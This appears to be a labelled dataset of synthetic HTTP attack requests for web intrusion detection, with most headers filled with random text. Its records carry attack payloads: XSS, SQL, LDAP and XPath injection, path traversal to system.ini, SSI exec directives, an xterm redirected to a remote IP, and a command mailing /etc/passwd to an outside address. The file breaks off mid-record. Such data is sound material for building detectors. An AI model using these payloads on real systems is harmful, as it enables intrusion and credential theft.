Warning: 252 128.216.248.229 "afhtyetiuekEae7t" "Tue, 17 Jan 06 06:14:48 CET"
X-Serial-Number: 60545098
----: ----------------
~~~~~: ~~~~~~~~~~~

h1otHw=sRjX&alenmsqrhphEit=]a&hy2enehlwieemie=pn fno&Et80ohsalmlhc=h_fBV&me17w.r-GR=4&rhaidru=e@.2D7mw-mE3&eeN=44&nt=&l 

End - Id: 48231
Start - Id: 46498
class: XSS
GET /"><img src="javascript:alert(document.domain)">? HTTP/1.1
Host: www.7tYaeia8t.fr
Connection: close
Accept: application/*;q=0.9
Accept-Charset: us-ascii
Accept-Encoding: compress
Accept-Language: *
Cache-Control: max-age=43417
Client-ip: 219.134.80.54
Cookie: at4a=93;0-esystem-vkincludeC=239;h3uneiOrir=H-%
Cookie2: $Version="88"
Date: Sat, 22 Jan 05 16:06:07 CET
ETag: W/"3BFM3KufvfBTZLQLS"
Expect: ninwdknn
From: musoa@e4qteeenfg.net
If-Modified-Since: Thu, 26 Oct 06 04:35:25 GMT
If-Unmodified-Since: Sat, 23 Feb 08 14:10:27 UTC
If-Match: *
If-None-Match: *
If-Range: "-j9OI@AIkxXhBo86PRq"
Max-Forwards: 723
Pragma: e='sfn'
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest algorithm=MD5-sess
Range: 8-112855,2026-165541
Referer: /nysler/Htas/mEvci/ae9fy.cgi
TE: trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/0.6 (compatible; eLrpdsEsu; Open BSD i586; nsNseyppSW; n1aeneee)
UA-CPU: x86
UA-Disp: 0683,5714,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 139x000
Via: 7ivmxe/2.5 www.6amie7.png, 7.5 www.antnn.gif, otrygw/7.4 122.239.150.30
Transfer-Encoding: otsn; troe=con6a
Upgrade: lNa/8.0, nnchdy/2.1, q9de/3.4, se9N7o/1.4
Warning: 000 30.27.133.227 "nEecyFef" 
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 46498
Start - Id: 38785
class: LdapInjection
GET /flinthiullycmttsal/i@cXbef8L3v14E/w-3SlK_eAjupI/3n6co/GbgsoundtH/o0IUwCewKIK/ps-D1LIHdl8_qraEDT/UlxUmiobjecty.YY4/r-IJ/a@EG8B_wPB.gif?iwst2edotjt=86&Bwyedyd=rEK1LmX-pe-t&mAoiigo97eseEpd=1372793&7Y0GYPiVt=s%27ie+ni%26mi&uAowmhmC=2EwfCmOWBF&trosfireaa=dexnsshtfop&repyoqceqt48e=7636545&ltm0e1encnS=ieu%26uiita&eeed=624%29%28%26%28objectClass%3D4iil%29%28%7C%28sn%3D+eer%29%28cn%3DT++J*%29%29 HTTP/1.0
Host: 239.143.107.146
Connection: close
Accept: audio/x-wav;q=0.4, application/rtf;q=0.3
Accept-Charset: iso-8859-3, x-mac-hebrew;q=0.2, windows-1250
Accept-Encoding: deflate
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 103.114.5.31
Cookie: ra5eethod1nw=lBa;Nor-giUgR@autoexec=81080648;Iuis3=dSyKw@Ss88z;Oa6aioi=92;ovEmaMsrtdihcep=ryI
Cookie2: $Version="919"
Date: Sat, 10 Jun 06 17:21:38 UTC
ETag: W/"saFjXR8ldmH5p5Akw0"
Expect: 100-continue
From: eedz@idneeachi.org
If-Modified-Since: Wed, 04 Jul 07 10:41:14 UTC
If-Unmodified-Since: Thu, 05 Nov 09 10:57:26 CET
If-Match: "xh2hiX1iqH@y@g2y0t"
If-None-Match: "eN33gtGBouoX8Cdp3I.a"
If-Range: *
Max-Forwards: 019
MIME-Version: 3.1
Pragma: trl='c54Efa9'
Proxy-Authorization: lnraO geepoll=oRsheku
Authorization: NTLM cnJ4aHJ0SGh5ZU9vaTY5QWxhbnBzZXNvbnRhc3Rla2hsaQ==
Range: 777808-9828,-9730,-076
Referer: /sL01/bmkt/wxepove2/zbomiueA.php
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/7.3 (X11; U; Open BSD i386 3.7; we-if; rv:4.9.7) Gecko/83367828
UA-CPU: StrongARM
UA-Disp: 754,7315,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 601x604
Via: HTTP/1.4 www.okit8hoc.css
Transfer-Encoding: compress
Upgrade: cjw/0.8, roll/0.1, tytuee/5.7
Warning: 757 214.136.112.103 "ie6uit3rtiiPirtc" "Mon, 03 Oct 05 02:38:07 UTC"
X-Forwarded-For: 199.212.3.152
X-Serial-Number: 323337935267147
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38785
Start - Id: 37080
class: LdapInjection
GET /wavurrosuran/eYneqpnl7ctiod/cWfdi5rtnona9so/cv/CYadminnph-LhL_6/9tJahJFyjr9a.cgi?yhoh=alJ3RPj0&xxs3g0erIs=tuiqn9hnuos&erekarceirri=5154819&54n=%29++++%28+%7C++%28++++cn%3D*o++%27brien*++%29%28mail+++%3D*o+++%27brien*%29&Oais6pnhsist3=%28vep&9e3smRtwtd=9&Rab=4e&ibsrqclo7teeakn=t0dH&tmpmQc=idmcog+pbeval%3Fix6copyc&gaaca7n=Nsem8reet4a&mmxxterm@Aq72e=%5Dallisma+c%3C%27n&nSo=o+ HTTP/1.1
Host: 99.152.84.178
Connection: close
Accept: */*
Accept-Charset: x-mac-greek;q=0.6, euc-cn;q=0.0, x-mac-roman;q=0.0, windows-1255;q=0.7
Accept-Encoding: identity, identity
Accept-Language: *
Cache-Control: no-transform
Client-ip: 154.56.180.14
Cookie: Initt=ln;2ojetbntse=slwinnt67kdi ei@orlsmoh 
Cookie2: $Version="6"
Date: Sat, 02 Feb 08 07:46:09 UTC
ETag: "Qo5vB6y78EBMnbaX9j.Q"
Expect: 100-continue
From: Wtzcle@sDsakEtber.gov
If-Modified-Since: Thu, 31 Mar 05 17:42:23 GMT
If-Unmodified-Since: Wed, 16 Jun 04 09:44:49 CET
If-Match: "FD7kfWPgalmexT4Sy3n"
If-None-Match: "vln_VlCTbsbty1@NgJa"
If-Range: Sun, 20 Jul 08 06:55:29 CET
Max-Forwards: 4
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: NTLM Mkxybmxvb2RsaWxzbm1uSWlzTWRhcHR0dHJna2FoNm8=
Authorization: NTLM dHRpamh0dGU4MWVobGxvYWVBdE9lYVBNaTBwZFR0bG5ybDBtcjVjaWFlc2M5dHo=
Range: -5
Referer: http://www.ii6m8no.uk/qtCTocv/ncOHd4wl.tiff
TE: trailers,trailers
Trailer: From
User-Agent: Mozilla/0.4 (compatible; awmsg; WinNT; AeePASahib; oSrcoino)
UA-CPU: 68000
UA-Disp: 538,106,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 7857x018
Via: Ieinpe/5.5 www.tr8ar.jpeg
Transfer-Encoding: nald
Upgrade: stee/0.5, Rob/4.7, geii2/2.7
Warning: 905 www.ilsemrE.gif "n9hMwntaulc" "Sat, 03 Nov 07 02:21:06 CET"
X-Forwarded-For: 4.45.247.215
X-Serial-Number: 252851
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37080
Start - Id: 45617
class: PathTransversal
GET /h4oRatgtaHf/nA/Hhth5ES/nm8s3thmn32rqd4o/rg5qe/FE.pl?rrodw0t2owbh=c&aaYaesRsttlidiv=%3Ce&etiaqgit4=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Fyo.bat HTTP/1.1
Host: www.oxtf6u6m.gov
Connection: xrs9hg
Accept: */*
Accept-Charset: iso-2022-jp, cp-932;q=0.3
Accept-Encoding: 
Accept-Language: andeze-enn;q=0.5, eh-i3i6boi, fe9aSwl-a3m;q=0.2, c-pmhfh
Cache-Control: rwem='neau'
Client-ip: 54.187.183.145
Cookie: s9tSp0a6=s
Cookie2: $Version="41"
Date: Sat, 20 Feb 10 11:36:39 GMT
ETag: W/"hYq.Qe6vS5JVPkNg"
Expect: 100-continue
From: aieelt@lnoh1ttGc.st
If-Modified-Since: Thu, 08 Apr 10 03:22:33 CET
If-Unmodified-Since: Thu, 26 Apr 07 22:21:28 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 45
MIME-Version: 4.5
Pragma: wia='eLi8'
Proxy-Authorization: ench vu6n=5eeTe
Authorization: Digest opaque="erutn"
Range: 942-,71595-5
Referer: http://www.bwuhoen.org/ssg8ehSy/noleDe.asmx
TE: deflate;q=0.2,deflate,trailers
Trailer: Transfer-Encoding
User-Agent: rTGkow/5.5.3.2
UA-CPU: Sparc
UA-Disp: 6050,986,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0039x975
Via: FTP/3.1 www.epolm.html
Transfer-Encoding: eiSs
Upgrade: wdths/1.4, ocajr/8.7, hnt/8.6
Warning: 979 249.143.44.161 "mpeqyef6" 
X-Forwarded-For: 48.145.225.109
X-Serial-Number: 749320741
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 45617
Start - Id: 35754
class: XPathInjection
GET /dEzVYI_YKeWsmATY6dnF/r9eOB-Nl0iLXtw/o0nasa5d3yyha.nsf?_hHoXZ=378289&oSdopEmszftlat=ainpimoo%27+or++++h%2F0Cinp%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D7%5D++or+++++%27knaao%27+++%3D++%27&cepeYo=6&oia=gmdtomeaeo&xl=d27-aeeeftmIa HTTP/1.0
Host: www.ttetNV.uk
Connection: keep-alive
Accept: application/zip, text/*;q=0.8
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: sMyc-tw;q=0.9, nw-d8te;q=0.9
Cache-Control: no-transform
Client-ip: 54.55.177.74
Cookie: imh6yeYte=c2qtis\id;63xterm.vC=Se;raaAusrleltr\g;5PkSunionlibI=childsgbtq;s3At0labodtr3=aFrc7ratne;tTN=87759
Cookie2: $Version="40"
Date: Wed, 05 Jul 06 23:59:50 UTC
ETag: W/"93dO5EHm@7LqEQZd"
Expect: ir13aesi=oye3fea;4ez86tn=EcuoTpy
From: nsEeee@gxtagow.be
If-Modified-Since: Sat, 26 Nov 05 05:31:57 GMT
If-Unmodified-Since: Fri, 10 Oct 08 06:02:25 UTC
If-Match: "Rqk.CsPwaBTeNP_0"
If-None-Match: *
If-Range: *
Max-Forwards: 771
MIME-Version: 6.5
Pragma: e=LXg
Proxy-Authorization: adwi etihc=5lIn4t
Authorization: Digest username="ectz2a"
Range: 912919-0,159182-1735
Referer: /euun/7iigtoa/Tousq2sd/la0rebn.txt
TE: trailers,trailers,trailers
Trailer: Connection
User-Agent: fsaqa/0.2
UA-CPU: x86
UA-Disp: 8135,7731,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 6100x360
Via: ddlt/5.7 66.142.214.252, 0.6 150.52.252.14, HTTP/8.1 www.haih9pe.jpg
Transfer-Encoding: deflate
Upgrade: Toa/4.1
Warning: 145 165.132.233.207 "niz6ueo" "Sun, 02 Mar 08 13:20:23 UTC"
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 040193563593
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35754
Start - Id: 41490
class: SqlInjection
PUT /ayeaoAveeondohroip0.exe? HTTP/1.0
Content-Length: 168
Content-Language: ate6ugo,sgwhrsa,a1nb
Content-Encoding: compress
Content-Location: http://www.erinh6y.st/40weszw/8sDlrs/sihRacoc/irrMsnR.php4
Content-MD5: dGFsbmlhb3phdDVldHJoZA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 08 Dec 09 14:48:02 GMT
Last-Modified: Sat, 14 Mar 09 21:15:08 GMT
Host: www.rnO5hxqn7o.org
Connection: close
Accept: image/*;q=0.0, audio/*;q=0.1, video/*;q=0.2
Accept-Charset: *
Accept-Encoding: *
Accept-Language: diDjaEeo-o, etane-Rodh, zFetzeta-ain;q=0.3, smt-rE;q=0.0, k1hir-rr9ete4;q=0.6
Cache-Control: no-transform
Client-ip: 40.1.50.64
Cookie: gotDilo=ea'+Mi+i;g1teserDmPE7t=16330632
Cookie2: $Version="965"
Date: Fri, 20 Oct 06 17:24:38 UTC
ETag: "VnPwVfdJ4vTCf5WSay"
Expect: rty1n7=s0jaueru
From: aase0a2W@eEfhtw.gov
If-Modified-Since: Sat, 08 Mar 08 14:51:08 CET
If-Unmodified-Since: Wed, 30 Nov 05 24:34:15 CET
If-Match: "KSbB8s_2Gt2VQgycS"
If-None-Match: *
If-Range: *
Max-Forwards: 581
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: NTLM aTVjZGF0c1NkdG5yemVpd2xmVGVUOGVtbzdMaHB3aW5zZWV0ZWlhcnJhcmVleWE=
Authorization: NTLM bXNzdWV5cHVKcjY3ZXRzOGhpNzNpbmtkbDdudUFyY1V0Y2plbDNPdHhhdmk=
Range: 78-403185
Referer: /sdcel/aeLe/euvbjeb/ioeau.jpeg
TE: chunked,deflate
Trailer: Accept-Encoding
User-Agent: Mozilla/9.6 (Windows; U; Win 9x 4.0; na-tc; rv:1.7.2) Gecko/28457451
UA-CPU: MIPS
UA-Disp: 8226,551,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 5893x919
Via: 6.0 186.5.57.15
Transfer-Encoding: deflate
Upgrade: tgh/9.5, bumnsf/4.1, dt1/2.5, imuous/2.6
Warning: 111 www.Ieeee3e.gif "edowgieoaEca" 
X-Forwarded-For: 37.28.59.187
X-Serial-Number: 6237226305508453843
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1iehse9=~sr&C_Flf=yant&ha7g=neltmAorehneIae&Afetc8=8ht8efdhnde&1s=uo&bdoptcatsh6DaDP=' AND    USER_NAME()='e7yinm&t9pcofiD=zi&byNql=h1vt77dfatwrlmis&em4=nI1

End - Id: 41490
Start - Id: 43488
class: OsCommanding
GET /auhogp3Z/taEmiWeiloe1ehrNq/cYVGiU0sTkdKeWoLa/erisnselIoolOgT/e8XJY4IESjA/qmb1HzdmKRnodeMb/lwXeagXD6H_uHen79hq/ao9wFvLWrFl/aBNc6F/flsraHetiahesreas/eV/fM1QQMPP6VI1.jpg?nHsrasOradif=%7C+%2Fusr%2Fopenwin%2Fbin%2Fxterm%2B-display%2B245.235.135.112%3A0%2500&tnp=imeampwn&oeelvaol=ztcwltoGnvsgCotEo&oeyplgiMa=1&n1o=21&siLner=esorIrj%5Dar%3Bn&ldg=cac6y7Ax&en1theebte6i4i=4&metaYsfyy=an9t HTTP/1.0
Host: 115.198.55.98
Connection: close
Accept: */*
Accept-Charset: iso-8859-3, x-mac-arabic;q=0.5, euc-cn, iso-2022-kr, windows-1254;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: na6soe='ubrdoH'
Client-ip: 56.144.145.164
Cookie: srfeaolkg=a02gMX;slH5ud=ncvr8ehiryes;mh9c3Ue=8
Cookie2: $Version="51"
Date: Sun, 05 Nov 06 24:23:10 GMT
ETag: W/"lGLw3QTcNpilMnmU"
Expect: 100-continue
From: oie3rs@dut5nl3e.uk
If-Modified-Since: Thu, 08 Jan 04 08:24:29 GMT
If-Unmodified-Since: Sat, 11 Dec 04 08:15:53 GMT
If-Match: *
If-None-Match: *
If-Range: "7yCZLPgOBjNDzS-j"
Max-Forwards: 980
MIME-Version: 0.6
Pragma: sttaot=aia
Proxy-Authorization: NTLM b2NpT2hvcW1vN2ljcXB0Z25oZXNzbUVvN2Vpc2FFcmRBc2RuaFQ=
Authorization: Digest opaque="umhet"
Range: 4-
Referer: http://buue1I.biz/meueJ/ncn6ryw.swf
TE: gzip,trailers,chunked;q=0.9
Trailer: Connection
User-Agent: rdfuah/9.0.1.1.1
UA-CPU: Sparc
UA-Disp: 6546,0956,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 2941x889
Via: HTTP/8.9 www.e6o2u4l.gif:4343
Transfer-Encoding: deflate
Upgrade: rhao/3.7, yin4/4.0
Warning: 847 www.0te1.css "ctnpcrbrylblaepn" "Wed, 02 Aug 06 09:38:06 UTC"
X-Forwarded-For: 137.226.116.122
X-Serial-Number: 5600215
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43488
Start - Id: 40294
class: SSI
GET /ozkW/czU1WUkbO/tltpOsqpQRI619k-5/disaeRpbsmhmeoIrteEe/ox@wdytfiYOhtK.nsf?S6rVe_du=7eeeeta6oew6&f7nzRiydooei=acaeYacf%3D&7l3s5fer5ostep=%3C%21--%23exec+++cmd%3D%22c%3A%5Cprogra%7E1%5Cceelad6aj%5Cla0y1%5C4IsicnzD.exe++d%3A%5CbimiTi%5Cwww.olndin.org%5Capol4Eaah%5Cdatabase.mdb++%2Fx++exporttofoxpro%22--%3E HTTP/1.1
Host: www.bater.fr
Connection: oW9ew
Accept: text/xml, image/*;q=0.1, image/*;q=0.4
Accept-Charset: x-mac-roman, x-mac-korean, iso-2022-kr, hz-gb-2312;q=0.6
Accept-Encoding: 
Accept-Language: 3cffee2N-e0rt;q=0.7
Cache-Control: no-cache
Client-ip: 10.192.46.139
Cookie: leeisrU4a=bMw8-5r1u2_;adfdhv6M=~ser@;psst=dyJ2wiIA;hcdheAHneqtNzi5=teglo3f4i;thp9th=nebin4boot.inifZAkm'j;rnsbva=hhl2sgrzexeoki
Cookie2: $Version="416"
Date: Sun, 16 Mar 08 21:53:45 UTC
ETag: W/"cZahXkYy1L59OAb"
Expect: 100-continue
From: sinl@n3biht.ch
If-Modified-Since: Sun, 06 Nov 05 12:31:26 GMT
If-Unmodified-Since: Sat, 19 Feb 05 20:08:46 CET
If-Match: "CZPNhKVbIgoCdwXQbhx"
If-None-Match: *
If-Range: "PHyY9dc1tgh1y@K"
Max-Forwards: 46
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: oeos goaweqW=tqMehbrx
Authorization: Basic ZGFrRmVvY286c2EwZQ==
Range: 5-
Referer: /ttsbdm/hdiRtn/heSfR/tsess6g.mp3
TE: gzip,deflate,gzip;q=0.6
Trailer: Cache-Control
User-Agent: aFhpdexmq (tOPn5G1P; e_prS8.iO9; e1wdWtaot_)
UA-CPU: MIPS
UA-Disp: 2515,7751,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 2184x777
Via: 8.0 www.aEltsa.jpeg, HTTP/7.9 46.135.1.61, 6.5 202.112.245.234
Transfer-Encoding: ramO
Upgrade: hiCkrp/2.9, tclcr/7.7, ntp5/3.3, her/1.8
Warning: 559 www.x4kdcw.js "6b1la22lnngto" 
X-Forwarded-For: 154.142.43.224
X-Serial-Number: 475557970524
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40294
Start - Id: 41849
class: SqlInjection
GET /3Z.tiff?rAe1rety=sxsoqra%5ClsTs&enleouk=e3yeGI0stV&Brif6pFsq9cukd=-5naore&ae=s&Etb0crkrtque=3174&oaHeeenur5=dcb&noe=71693152&l9cVxb=zsa&tcsctt3=m4NpMyx%40luOz&ltdrhads=o8i3ctdskcnGzs&UgDWdyA@Bwp-w=0ojn5ov&ePsa=ko6e&xlhwindow.opencNh=%27++++%29+UN%2F**%2FION++ALL++SEL%2F**%2FECT+%27mshr%27%2C62%2C3%2C%27srHtl%27%2C9+FROM+++++bg++++WHERE+%28++%27%27+++%3D+%27 HTTP/1.1
Host: 117.199.60.104
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.1
Accept-Encoding: identity, gzip;q=0.7, identity, compress
Accept-Language: *
Cache-Control: max-stale=86025
Client-ip: 78.57.136.131
Cookie: ros=tCHD4i;onpgxINe4w=2;asheyCtirTe=entr
Cookie2: $Version="08"
Date: Tue, 03 Jun 08 07:26:01 CET
ETag: "a2V9IycN6MWKRF29Nv"
Expect: 100-continue
From: dupNd@t1Lces4e.com
If-Modified-Since: Fri, 10 Jun 05 17:32:58 UTC
If-Unmodified-Since: Sat, 17 Jan 09 06:37:10 UTC
If-Match: "l-GQLSH_WHdBbLiKgFA"
If-None-Match: *
If-Range: *
Max-Forwards: 0553
MIME-Version: 1.6
Pragma: wftSdxh=saeirif
Proxy-Authorization: Basic ajU1aXBLYTM6b2R5ZW5EbjU=
Authorization: trzlai 6oadtc=6ostB
Range: 73381-69805,4-176585
Referer: /niiehfa.tiff
TE: gzip;q=0.5,trailers
Trailer: Expect
User-Agent: lrehpsseeid2noT
UA-CPU: 68000
UA-Disp: 658,0030,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 5914x483
Via: FTP/8.6 75.221.6.220, FTP/2.7 180.144.40.176
Transfer-Encoding: compress
Upgrade: rz8alu/5.3, a4rs/2.4, FoE/2.5, 2hiDn0/2.7
Warning: 658 www.ease.shtml "qhnna" 
X-Forwarded-For: 219.12.246.47
X-Serial-Number: 10397953831192510
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41849
Start - Id: 36129
class: PathTransversal
GET /lr9qpRNJ5.nb4a/le/jtalwjeoe/iSn9LTjg0emQU/a865dvmnq3e/iOkM8/eVLAvdUtkvKRntM/5-i/2nVEjSm/gepliseyo/tesrqe/wrsefajr.gif?YLt1VzhL.Q=etefloehE8sEQo&unbennyaWnbat5v=..........................WINNTsystem.ini&nM0xcJ8Cafq=lhn HTTP/1.1
Host: 8.217.82.136
Connection: omodyrod
Accept: video/*, image/png;q=0.1
Accept-Charset: hz-gb-2312, windows-1251, x-mac-chinesesimp
Accept-Encoding: *
Accept-Language: zma-fmeap;q=0.9, iab7il2H-deeheoe;q=0.4
Cache-Control: min-fresh=86302
Client-ip: 77.156.80.102
Cookie: roi=2650526;rrAeq7etoyo1=eCt1oyeIusurewh;aawsnpalgnov7=tfEh
Cookie2: $Version="2"
Date: Tue, 16 Aug 05 12:09:49 GMT
ETag: "O@wdOljLOEMWn41hVasM"
Expect: ieg5
From: dzgo@mzeta.ch
If-Modified-Since: Thu, 28 Sep 06 01:12:51 GMT
If-Unmodified-Since: Sat, 10 Oct 09 11:05:22 CET
If-Match: "b5e7vsLGQtX1LeaFOqP"
If-None-Match: *
If-Range: "A2JxszXcuc0p9dt-XP"
Max-Forwards: 51
MIME-Version: 5.0
Pragma: oiR='nSrttsQc'
Proxy-Authorization: NTLM aWVhbTh3ZWFleGRmaGd0cm5VMHN0ZXh2M2lnb05qdGVoZWhzdQ==
Authorization: easg 1amtga=rtldeoqa
Range: -549293,-6
Referer: http://wurLpa.org/qmnSeeoe/4vpa/eaamie/itesg6.js
TE: trailers,gzip,trailers
Trailer: Proxy-Authorization
User-Agent: vebqgaeanNbrENirheae
UA-CPU: MIPS
UA-Disp: 0150,960,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 7606x3250
Via: 6.9 www.Enamoke.html
Transfer-Encoding: deflate
Upgrade: nhS/5.5, hvnd/7.0, s5HomA/4.0, gonou5/9.7, epl/7.7
Warning: 565 www.Stne8T.html "eAh6" "Thu, 04 Dec 08 18:59:50 UTC"
X-Forwarded-For: 129.108.57.155
X-Serial-Number: 6486734154619358
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36129
Start - Id: 35403
class: SqlInjection
GET /tYpditddir/VyPHRo6w4Sg-/sWu5b625T8hzWEbmc/ffee5S/i2c/lTT/s2tP5rjHvch-VRZ2e.css?jQUY8=qwer%27+or++++ec2nH_v.Account%3D%27htaag%40air.com&xDmrecn9a5eoA=o+ HTTP/1.0
Host: 110.20.126.180
Connection: close
Accept: */*;q=0.8
Accept-Charset: x-mac-chinesetrad;q=0.0, big5;q=0.5, windows-1251;q=0.6
Accept-Encoding: compress;q=0.5, gzip, deflate;q=0.7
Accept-Language: h4los5tn-7bjdtk, 3tA-s, aodrcas-ucy;q=0.0, i5udery-MDrc, s-qx;q=0.0
Cache-Control: LllC=sqrb
Client-ip: 145.236.174.245
Cookie: iOtersyone4=eOesFgpt4v6sl
Cookie2: $Version="1"
Date: Sat, 15 Sep 07 15:32:00 UTC
ETag: "w.bssa@znOLYSv9"
Expect: aeuor=cxtirylr
From: nceooR@ecnsnwaoq4.de
If-Modified-Since: Sat, 04 Mar 06 08:57:18 UTC
If-Unmodified-Since: Thu, 28 Dec 06 10:57:58 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 23 Jun 06 24:35:55 CET
Max-Forwards: 7500
MIME-Version: 4.3
Pragma: ilmaI='rnS'
Proxy-Authorization: Basic YXdpZHY6dzV0cHNoZnI=
Authorization: NTLM cndvc3RvZWJHZXNmZTU4cmJXaWRvYlNhaWFlMGdlZGk0UnVuNHA=
Range: -67
Referer: http://attf.it/iseIz1t/wohEe/leepi.gz
TE: gzip
Trailer: Proxy-Authorization
User-Agent: Mozilla/9.8 (compatible; MSIE 9.2; Win98; EeSroeset)
UA-CPU: 68000
UA-Disp: 962,2383,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 9837x1680
Via: 9.4 www.aee3.css, soDen/3.5 www.mtthra.png
Transfer-Encoding: sawwG; rPdgyO=te8eIg
Upgrade: to9t/2.8, 4Egiin/1.2, doaAoo/6.7, Tuann/2.6
Warning: 626 www.oshnoh.js "antet8eadasscGdetdy4" "Tue, 26 Sep 06 16:40:30 UTC"
X-Forwarded-For: 165.157.207.111
X-Serial-Number: 840148
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35403
Start - Id: 40455
class: SSI
GET /ts/wc6erctwfeapoTlizei.php3?treisossglAkhb=9158745175&izthlEnhjic8uts=u1c4enujmbadcs&tdT=%3C%21--+%23include+++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+++--%3E&iefsnniR=6fd9%7Eegh+o&etzio4iprrwso=nesh2wadek&7ehse5hhrt6=H HTTP/1.0
Host: www.kw6Ie.org:80
Connection: close
Accept: text/xml
Accept-Charset: iso-8859-5, utf-7;q=0.0, windows-1250;q=0.0, x-mac-chinesesimp, iso-8859-2
Accept-Encoding: *;q=0.7
Accept-Language: o-l, om-lHcfxt, inTqt-neaiohli, a-eod, stltaqt-riwRf;q=0.1
Cache-Control: hadeistE='7'
Client-ip: 202.75.46.235
Cookie: WVZconnectO5vl@7winnt=bsf;nzyneTgtoP=510;lnariraAovaea=4073
Cookie2: $Version="7"
Date: Wed, 11 Oct 06 15:57:01 CET
ETag: W/"Qw2wTPXDDGTkY-yl3G"
Expect: 100-continue
If-Modified-Since: Tue, 13 Jul 04 05:27:11 CET
If-Unmodified-Since: Fri, 06 Jun 08 19:15:22 UTC
If-Match: *
If-None-Match: *
If-Range: ".LnnLDZB4FdRb_Q3y"
Max-Forwards: 3362
MIME-Version: 4.8
Pragma: zoysyl2=bstXe7Tu
Proxy-Authorization: Basic cm1lbzpTZWFu
Authorization: NTLM ZW9lbGxsTGFxcHB4b28yZW1DbmhpRHRiRTZuMXRySGhlYWk3bm5pdWxobnQ=
Range: 688-12571,5864-06540,0825-1066
Referer: http://igDtRo.biz/smafe/Eiend/veoemani.mpg
TE: gzip,trailers
Trailer: If-Match
User-Agent: Mozilla/2.0 (Machintosh; U; Mac OS X 1.9; 1i-lh; rv:6.9.7) Gecko/40548091
UA-CPU: 68000
UA-Disp: 0939,1824,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 025x185
Via: FTP/2.0 48.53.180.231, 2.1 www.ptea.htm, 0.6 www.4rlnar.shtml
Transfer-Encoding: compress
Upgrade: 5tNn/1.3, eSn/8.3
Warning: 218 www.tisoHb.htm "wmoeMido5" "Sun, 29 Feb 04 21:33:45 CET"
X-Forwarded-For: 231.125.197.76
X-Serial-Number: 98565372421828
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40455
Start - Id: 42916
class: OsCommanding
GET /nlMgkaaEY/d.@j7xs6a/0rhsfedeeseifrg/h5mG/tAmG/5oZjxcF2HWf/mad/1Uz/J6/al./txjeT/aiaN.js?hccohuns=passwd&ghreoetsan=t0mGIPHyMlJ HTTP/1.0
Host: www.7scNFlkaia.be
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.8
Accept-Language: oops    ;    cat  /etc/passwd   |   mail     your@h3a.com
Cache-Control: no-cache
Client-ip: 216.204.56.99
Cookie: IXGaPoIbdx=2y.S1S;3moei= iframegcf;KB3K6O4A3Gb=l3FHUQ5Eon;tlrnutelotyt=7eme;tttnrvHeNy=r75UbI
Cookie2: $Version="35"
Date: Thu, 17 Sep 09 23:53:48 GMT
ETag: W/"j_xMG_CpbOwHthHE"
Expect: 100-continue
If-Modified-Since: Tue, 10 Feb 09 06:46:32 UTC
If-Unmodified-Since: Tue, 24 Oct 06 17:10:48 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 342
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic NGVpZWE3Om5uYWg=
Range: 761836-
Referer: /yhEho/rbYee/et2aa/Eio2x.wav
TE: chunked,chunked
Trailer: Pragma
User-Agent: Mozilla/6.4 (Windows; U; Win 9x 4.9; hr-es; rv:7.6.4) Gecko/86439894
UA-CPU: x86
UA-Disp: 0478,435,16
UA-OS: Windows 98
Via: HTTP/8.8 186.54.26.152, 2.0 www.aieeiolT.tiff, 5.3 235.102.137.209:46775
Transfer-Encoding: gzip
